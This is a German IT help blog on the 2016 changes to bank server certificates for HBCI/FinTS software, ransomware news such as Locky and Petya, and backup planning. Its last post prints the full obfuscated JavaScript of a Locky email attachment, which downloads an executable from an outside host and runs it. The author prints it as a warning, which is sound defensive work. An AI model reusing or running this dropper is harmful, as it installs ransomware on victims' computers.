Sehen Sie diesen Fehler, z.B. in Profi cash, dann fehlt vermutlich das aktuelle Verschlüsselungszertifikat.

Ergänzung 26.02.2018: Wenn Sie bei der Datenübertragung zu einer Sparkasse den Fehler haben, lesen Sie bitte hier weiter.

Wahrscheinlich ist Ihre Software nicht auf dem aktuellen Stand:

Status der HBCI-Übertragung: Fehler
(Dialog) INERR (9999) Die HTTPS-Verbindung konnte nicht hergestellt werden. ()
(Dialog) INERR (9999) HTTPS-Verbindung: Die Überprüfung des SSL-Zertifikats von 'https://hbci-pintan.gad.de/cgi-bin/hbciservlet'
 ... ist fehlgeschlagen. ()
(Nachricht) INERR (9999) Dieser Auftrag wurde aufgrund vorhergehender Fehler nicht gesendet. ()
Job  'Umsatzabfrage' zu Konto 'Kontoname' am 04.04.2016 nicht erfolgreich ausgeführt !!!

 

Lesen Sie dieses hier: Profi cash Datensicherung und Update durchführen.

fingerprintveraltet, bitte wenden Sie sich an Ihre Bank!
Die wichtigsten Details des Verschlüsselungszertifikats der Adresse
HBCI-PINTAN.GAD.DE

Überprüft durch: VR IDENT SSL CA 2016
Läuft ab: 16.04.2019
Organisation: FIDUCIA & GAD IT AG
Zertifikat des Herausgebers
Seriennummer: 00 F2 C0 0D CA 12 5A 3B 8F B6 98 DA
Nicht gültig nach: 2019-04-16
Zertifikat-Fingerabdruck SHA256:
83 78 7C EA CC 0A 5B A9 9A 8C FB F0 E5 04 3C 68
50 82 FE 62 08 9E 57 8E E0 7A 17 13 90 75 36 C3
SHA1-Fingerabdruck des Schlüssels:
E4 F1 07 A9 13 EA 5F B2 99 6A A5 59 0C 1B 5D 58 F3 83 B0 61

fingerprint
Die wichtigsten Details des Zertifikats der Adresse
EBICS.MULTIVIA-SUITE.DE

Überprüft durch: VR IDENT SSL CA 2016
Läuft ab: 14.04.2019
Organisation FIDUCIA & GAD IT AG
Zertifikat-Fingerabdruck SHA1: 
3E 53 CC 01 89 7C 89 65 FC EC BA 0B 04 B1 25 6A 5C 84 8F 84
SHA256:
33 54 99 8C DA 8A A8 EB 98 B6 BC 61 F8 62 39 90
35 1F 4E B2 8D 63 D1 C2 64 A2 51 85 BD 11 7F DF

Am Freitag hatte der Admin frei, am Samstag war dann Samsa da?Malware-Warnsymbol_rot_gluehend

Bei den aufgedeckten Fällen mit dieser Erpressersoftware wird offensichtich  viel „per Hand“ erledigt, der Einbruch in das Netzwerk und auch die Verschlüsselung des Systems erfolgt gezielt manuell.

Bei dem Aufwand ist auch die Lösegeldforderung höher – 50 Bitcoins für die Entsperrung des gesamten Netzes entsprechen heute fast 19.000,00 Euro. Der Einzelrechner ist mit 1,5 BTC dabei. Da sind die 0,5 BTC des Locky-Trojaners ja fast ein Schnäppchen.

Billige, „für alle erschwingliche Massenware“ gegen gezielte individuelle „Kundenbetreuung“ also auch hier 😉

Da fragt man sich, ob nicht gleich noch andere Beute gemacht wird, also z.B. mit Industriespionage und/oder Sabotage. Womöglich ist einem Wettbewerber die noch nicht zum Patent angemeldete Erfindung des Konkurrenten sogar etwas mehr wert als 50 Bitcoins?

Wer sich übrigens für die Erträge der Erpresser interessiert: Die Transaktionen von Bitcoinzahlungen sind ja nachvollziehbar, auch wenn die Eigentümer der Wallets nicht bekannt sind.

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-mit-neuer-Taktik-Erst-schauen-dann-verschluesseln-3153767.html

Schloss-goldAm 04.04.2016 werden Verschlüsselungs-Zertifikate am FinTS/HBCI-Server für den PIN&TAN-Zugang unter gad.de getauscht. >>allgemeine Info

Da die VR-NetWorld Software die Zertifikate selbst verwaltet und sich nicht auf das Betriebssystem verlässt, muss der Zertifikatsbestand auf dem aktuellen Stand sein, wenn Sie ein Konto einer Bank mit  PIN&TAN führen.

Online Updates erhalten Sie für: Versionen ab 5.20 und 6.0

Sie benötigen mindestens Version 5.22 Build 13.

VRNWS_update_Build13

Veraltete Versionen:

VR-NetWorld Version 4.x wird nicht mehr aktualisiert. Neben dem Zertifikatsspeicher fehlen wichtige SEPA-Updates, deshalb kann der Betrieb nicht mehr sichergestellt werden.

Version 5.x erhält mit dem Zertifikatsupdate ebenfalls die letzte Aktualisierung. Je nach Lizenzmodell der Bank erfolgt die Aktualisierung auf unterschiedliche Weise.

Hier sind ggf. Lizenzen oder ein Programmwechsel nötig, bitte sprechen Sie mit Ihrem Lizenzgeber.

Kundinnen und Kunden der GLS Bank können unter gls-laden.de eine aktuelle Lizenz Version 6 erwerben.

 

 

Die Spirale der veröffentlichten sogenannten „Erpressungs-Trojaner“ dreht sich weiter und augenscheinlich immer schneller:

Malware-Warnsymbol_rot_gluehendDie gerade neu entdeckte Schadsoftware „PowerWare“ vermeidet das Nachladen verdächtiger Dateien komplett. Sie nutzt vollständig die im Windows vorhandenen System-Programme und muss sich dann nur noch mit Verschlüsselungs-Schüsseln online versorgen. Damit vermeidet sie die Entdeckung durch Antiviren-Programme, die sich bisher gut an solchen Nachladeroutinen orientieren konnten. Auch die Verschlüsselung wird komplett Windowsroutinen überlassen, die Prozesse finden quasi im „erlaubten Bereich“ statt.

Quelle:
http://www.heise.de/newsticker/meldung/Neue-Infektions-Masche-Erpressungs-Trojaner-missbraucht-Windows-PowerShell-3151892.html

Offensichtlich geht es in die nächste Eskalationsrunde: Bisher verschlüsselten die Ransomwaretrojaner nur einzelne Dateien, jetzt schließen Sie die gesamte Festplatte weg, so dass der Computer nicht mehr nutzbar ist.

Malware-Warnsymbol_rot_gluehendMir ist bisher nicht klar, ob dies sogar fremde Partitionen einschließt, so dass eine parallele Nutzung von z.B. Windows mit Linux oder auch Mac mit Parallels/Windows eine Gefahr für das gesamte System darstellt.

Backups werden also noch wichtiger, wenn man auf ein funktionsfähiges Computersystem angewiesen ist. Es kann sich lohnen, einen Zweitrechner in Petto zu haben. Ich denke da  z.B. an Leasingrückläufer, die zwar ein paar Jahre auf dem Buckel haben, aber als Bürorechner mit aktuellem Windows-System sehr gute Dienste leisten können.

Quelle:
http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html


Ergänzung:

Zitat: UEFI-Systeme lassen sich retten

Die Sicherheitsforscher bestätigen die Erkenntnisse von heise Security, dass nur Systeme mit MBR verschlüsselt werden.

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-Neue-Infektionswelle-rollt-an-Verschluesselung-bisher-nicht-knackbar-3160177.html

Update 2: Daten wiederherstellen, Entschlüsselung möglich:

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-geknackt-Passwort-Generator-veroeffentlicht-3167064.html

zuletzt geändert: 07.04.2016

Schloss_kaputtVeralteter Inhalt. Die gad.de Adressen gelten nicht mehr für FinTS, nur noch Adressen mit atruvia sind nutzbar seit 03.2024

Am Montag, 04.04.2016 wurden gegen 13.00 Uhr Verschlüsselungs-Zertifikate am FinTS/HBCI- PIN/TAN und EBICS-Server unter gad.de getauscht. Die Zertifikate für das Onlinebanking per Browser wurden bereits eine Woche vorher gewechselt. Der technische Hintergrund ist ein Wechsel der Root-Zertifikatsstruktur.

Leider wurden die betroffenen Banken erst sehr spät informiert.

Die Listen und Informationen werde ich aktualisieren, sobald mir weitere Details bekannt werden.

Nicht betroffen sind
User des FinTS/HBCI-Verfahrens mit Signaturdatei („HBCI-Classic“) und/oder Chipkarte (Kartenleser mit USB-Anschluss).

Konnten Sie seit Montag, 04.04.  ab 14.00 Uhr noch erfolgreich Daten übertragen, also beispielsweise Kontoumsätze abholen, dann benötigen Sie kein Update! Sollten Sie trotzdem Fehler erhalten, liegt es an etwas anderem.

Ebenfalls nicht betroffen sind alle ddbac-Programme (GLS eBank/windata, Quicken, Lexware, Wiso etc.) aber auch  Apps wie GLS mBank, Banking4 von subsembly und outbank verlassen sich auf das Betriebssystem und sollten keine Probleme verursachen, sofern dieses aktuell ist (s.u.). Mac, iOs und Linux-Programme arbeiten entsprechend und sollten ebenfalls wenig Probleme verursachen.
Es kann sein, dass Sie nach einer Bestätigung des Fingerprints des Zertifikats gefragt werden.

Programme, die eigene Zertifikatsverwaltungen nutzen, benötigen Programmupdates für das PIN und TAN bzw. EBICS-Verfahren .

Dies sind in erster Linie (klicken Sie ggf. auf den Link):

Bevor Sie Maßnahmen ergreifen und Aktualisierungen durchführen: Erstellen Sie eine frische Datensicherung Ihres Datenbestandes.

erste_Hilfe


SFIRM32
Dazu schreibt der Hersteller:
http://www.sfirm.de/nc/aktuelle-meldungen/aktuelles/article/hinweise-zum-austausch-der-ssl-zertifikate-der-gad.html

Für Version 2.5 gibt es also nur den Wechsel auf die neue Version 3.x. oder der Wechsel der Programm-Plattform auf eine Alternativ-Software.


Rufzeichen_60Für Starmoney 9 und 10 und die aktuelle Version von Starmoney-Business stehen seit dem 23.03. Onlineupdates bereit, die den Lizenzspeicher auf den aktuellen Stand bringen.


alte Betriebssysteme

Bei Windows-XP und alten Serverversionen bin ich mir nicht sicher, ob die Updates oder Datenübertragungen durchgeführt werden können.

Ein Wechsel ist hier allein aus Sicherheitsgründen dringendst angeraten!


Zertifikatsprüfung, Fingerprint:fingerprint

Einige Programme ermöglichen/fragen nach einer manuellen Zertifikatsprüfung und Bestätigung des Hashwertes der öffentlichen Schlüssel. Insbesondere wird dies wahrscheinlich bei einigen Installationen von aqfinance (gnucash) und Hibiscus (jverein/jameica) und ggf. pecunia Banking (mac) nötig sein. Den Fingerabdruck können Sie über den Browser gegenprüfen. Lesen Sie hier mehr.

Digitale Erpressung ist für die Betrüger äußerst lukrativ und wir stehen vermutlich erst am Beginn einer Welle von Erpressungstrojanern, die neuesten Varianten dieser Viren sind vermutlich so gut Security-Shieldsprogrammiert, dass eine Entschlüsselung nicht mehr möglich ist. >Heise über PGP-Trojaner

Regelmäßig durchgeführte und geeignete Datensicherungsstrategien (Backups) sind absolut notwendig, wenn man wichtige Daten mit digitaler Technik verwaltet und mehr und mehr von der Technik abhängig wird.

Worst Case Szenario – was wäre wenn?

Ich halte folgendes regelmäßiges Gedankenspiel für sehr wichtig:

  • Was passiert im schlimmsten Fall mit meiner Arbeit/meinem Hobby oder meinem Betrieb/meinem Verein, wenn mir mein Arbeitssystem komplett abhanden kommt (Diebstahl, Brand im Serverraum)?
  • Kann ich sicherstellen, dass ich in der gewünschten Zeit wieder arbeitsfähig bin?
  • Was kostet mich der Aufwand?
  • Wie groß wäre der potentielle finanzielle oder zeitliche Schaden?
  • Habe ich Ausweichmöglichkeiten?
  • Könnte der Diebstahl Auswirkungen auf Zugänge haben und könnte ich diese schnell genug sperren, Passwörter ändern?
  • Hat sich nach meinem letzten Gedankenspiel wesentliches geändert, ist Hard- und Software noch zeitgemäß und kostengünstig ersetzbar?
  • Stimmen die Verträge mit meinen Dienstleistern noch und sind sie angemessen?

Gedankenspiele reichen nicht, Testen ist wichtig

Man muss regelmäßig testen, ob die Sicherungsmaßnahmen ausreichen und funktionieren, die man getroffen hat. Was nützt mir beispielsweise ein perfekt durchorganisiertes und zuverlässiges Bandsystem, wenn ich es an keinem Ersatz-Computer mehr installieren und an Laufen bringen kann. Oder wenn die alte Software auf einem aktuellen Betriebssystem nicht mehr funktioniert? Oder im Betrieb: Wenn die Leute, die sich mit der Rücksicherung einer Datenbank auskennen, bereits in Rente oder woanders beschäftig sind?


Was Sie zur Vorsorge wg. der aktuellen Bedrohungen machen sollten, können Sie hier lesen:

http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Was-tun-gegen-den-Windows-Schaedling-3112408.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-fernhalten-Mit-Windows-Bordmittel-Makros-in-Office-2016-global-verbieten-3149377.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Surprise-verbreitet-sich-anscheinend-ueber-TeamViewer-3148863.html

http://www.heise.de/thema/Ransomware

Über den Unsinn mit der Mail von „den unbekannten Absendern“.


Ergänzung: Es gibt ein Tool im Betastadium (aktuell nicht für den produktiven Betrieb empfohlen), das auf das typische Verhalten der Verschlüssellung reagiert und den Prozess anhält und Alarm schlägt:
http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Batch-Dateien-infizieren-Windows-Tool-verspricht-Schutz-3118188.html

Das Tool ist nur ein Hilfsmittel und kein Ersatz für eine regelmäßige Datensicherung.

Update (04.07.2016):
Heise: Gratis Tools entschlüsseln diverse Erpressungs-Trojaner

Die mir zugeschickte vermeintliche Rechnung oder das Fax enthält einen Anhang, der mit knapp über 700 Bytes (!)  einfach zu klein für ein PDF ist.

Was ist da los? Kein Virenscanner erkennt die zip Datei und den Javascript-Inhalt als Container einer Virendatei? Keiner von 54 Scannern auf Virustotal schlägt Alarm? Mein Kollege spekulierte gar nicht so abwegig: Das ist bestimmt der Bundestrojaner, der kommt „von oben“ und wird halt nicht erkannt.

Der Anhang enthält eine Javascript-Datei, die offeniichtlich  eine mit Unicode-verschleierte Webseite nachladen will. Sehr perfide, sehr geschickt.

Glaubt man den aktuellen Zahlen, werden pro Stunde 5000 Rechner in Deutschland vom enthaltenen Locky-Virus infiziert. Die Ransomware verschlüsselt die erreichbaren Dateien und man erhält  nur durch Zahlung eines Lösegeldes wieder die Ursprungsdateien zurück.

Siehe auch:
http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript-1602-119331.html
Erpressungstrojaner Tesla (intern vrkennung.de)

Bildschirmfoto_2016-02-24_21-07-26

 

Die Verschleierung ist kein neues Thema:
http://www.heise.de/security/meldung/Rueckwaerts-wird-ein-Virus-draus-1242127.html

Code des Anhangs ( Javascript Datei hier als einfacher Text dargestellt und deshalb harmlos):

var fawqAx= this[‚\u0041c\u0074i\u0076\u0065XO\u0062je\u0063t‘];
var laMhHYOhH = new fawqAx(‚\u0057S\u0063r\u0069\u0070\u0074\u002E\u0053\u0068e\u006C\u006C‘);
var uDsEft = laMhHYOhH[‚\u0045x\u0070\u0061\u006E\u0064Envir\u006Fn\u006De\u006E\u0074S\u0074\u0072in\u0067s‘](‚\u0025TE\u004DP\u0025‘) + ‚\u002F\u0068\u0055O\u0048Mma\u0069n.\u0065x\u0065‘;
var nheEANo = new fawqAx(‚\u004D\u0053XM\u004C\u0032.X\u004D\u004C\u0048TT\u0050‘);
nheEANo[‚\u006Fn\u0072\u0065\u0061\u0064y\u0073\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e‘] = function() {
if (nheEANo[‚\u0072\u0065a\u0064\u0079\u0073t\u0061\u0074\u0065‘] === 4) {
var RxgIdfvB = new fawqAx(‚\u0041\u0044\u004F\u0044\u0042.S\u0074\u0072\u0065\u0061\u006D‘);
RxgIdfvB[‚op\u0065\u006E‘]();
RxgIdfvB[‚\u0074\u0079pe‘] = 1;
RxgIdfvB[‚\u0077ri\u0074\u0065‘](nheEANo[‚\u0052es\u0070\u006F\u006E\u0073e\u0042\u006F\u0064\u0079‘]);
RxgIdfvB[‚\u0070os\u0069\u0074\u0069\u006F\u006E‘] = 0;
RxgIdfvB[‚\u0073av\u0065\u0054o\u0046\u0069le‘](uDsEft, 2);
RxgIdfvB[‚\u0063lo\u0073\u0065‘]();
};
};
try {
var    HYOAzVaz = ‚R\u0075n‘;
nheEANo[‚\u006F\u0070en‘](‚GE\u0054‘ , ‚h\u0074\u0074p://\u0068t\u0074\u0070\u003A\u002F\u002F\u0066i\u0072\u0073t\u0063o\u0070\u0079\u006Dall\u002E\u0063\u006F\u006D/\u0073\u0079\u0073t\u0065m\u002F\u006Co\u0067\u0073\u002F\u0038\u0037h7\u00354‘, false);
nheEANo[‚\u0073e\u006Ed‘]();
laMhHYOhH [HYOAzVaz](uDsEft, 1, false);
} catch (ajg9ggxFs) {};